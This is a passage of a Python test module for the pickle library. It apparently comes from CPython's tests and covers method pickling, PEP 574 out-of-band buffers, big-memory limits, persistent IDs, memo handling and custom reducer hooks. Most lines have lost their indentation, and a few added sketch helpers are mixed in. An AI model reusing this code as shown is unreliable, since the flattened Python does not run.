large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
            # There shouldn't be too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when looking up
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
def buffer_like_objects(self):
# Yield buffer-like objects with the bytestring "abcdef" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
                    # Returning a true value from buffer_callback should have
                    # the same effect (the buffer stays in-band)
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
            # Non-iterable buffers argument
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
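
def _oob_buffer_roundtrip_sketch():
    # A minimal, standalone sketch (not used by any test above) of the
    # PEP 574 out-of-band flow that test_oob_buffers exercises; the function
    # name is illustrative only, and it assumes the module-level
    # ``import pickle`` at the top of this file.
    payload = b"abcdefgh"
    buffers = []
    # list.append returns None (a false value), so the buffer is kept out of
    # band instead of being embedded in the stream.
    data = pickle.dumps(pickle.PickleBuffer(payload), protocol=5,
                        buffer_callback=buffers.append)
    # The collected buffers must be handed back for unpickling to succeed.
    return pickle.loads(data, buffers=buffers)
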
class BigmemPickleTests(unittest.TestCase):
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1-byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
import os
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
os.remove(TESTFN)
def test_load_closed_file(self):
import os
f = open(TESTFN, "wb")
try:
f.close()
            self.assertRaises(ValueError, self.load, f)
finally:
os.remove(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
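
# How the persistent-ID mixins in this area (the class above and the identity
# variant below) are typically wired up in concrete test modules (a hedged
# sketch only; the class and variable names here are illustrative, not the
# actual classes used elsewhere):
#
#     class PersistentPickler(pickle.Pickler):
#         def persistent_id(self, obj):
#             return test_case.persistent_id(obj)
#
#     class PersistentUnpickler(pickle.Unpickler):
#         def persistent_load(self, pid):
#             return test_case.persistent_load(pid)
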
class AbstractIdentityPersistentPicklerTests(unittest.TestCase):
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if f.seekable():
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if f.seekable():
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
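# A hedged, illustrative sketch (not part of the test suite above): the memo
# behaviour that test_clear_pickler_memo() checks, shown with the concrete
# stdlib pickle.Pickler.  Repeated dumps of the same object shrink to memo
# references until clear_memo() resets the table.
def _sketch_clear_memo_effect():
    import io
    import pickle
    data = ["abcdefg", "abcdefg", 44]
    buf = io.BytesIO()
    pickler = pickle.Pickler(buf)
    pickler.dump(data)
    first = buf.getvalue()
    buf.seek(0)
    buf.truncate()
    pickler.dump(data)   # memo hit: the list is emitted as a back-reference
    second = buf.getvalue()
    pickler.clear_memo()
    buf.seek(0)
    buf.truncate()
    pickler.dump(data)   # memo cleared: a full serialization again
    third = buf.getvalue()
    return first != second and first == third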
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
    Such a callable may be created by people other than the authors of the
    BBB class. If passed as the state_setter item of a custom reducer, it
    allows for custom state-setting behavior of BBB objects. One can think of
    it as analogous to list_setitems or dict_setitems, but for foreign
    classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case, the callback returns an invalid result (not a 2-5
# tuple or a string), the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests(unittest.TestCase):
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
                # math.log does not have its usual reducer overridden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
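# A hedged, illustrative sketch (not part of the test suite above): a concrete
# reducer_override() hook on the stdlib Pickler (Python 3.8+) that redacts one
# class and defers everything else by returning NotImplemented.
def _sketch_reducer_override():
    import io
    import pickle
    class Secret:
        pass
    class RedactingPickler(pickle.Pickler):
        def reducer_override(self, obj):
            if isinstance(obj, Secret):
                return str, ("<redacted>",)
            return NotImplemented  # fall back to the normal reduction machinery
    buf = io.BytesIO()
    RedactingPickler(buf, pickle.HIGHEST_PROTOCOL).dump([Secret(), 42])
    return pickle.loads(buf.getvalue())  # -> ['<redacted>', 42]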
class AbstractDispatchTableTests(unittest.TestCase):
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
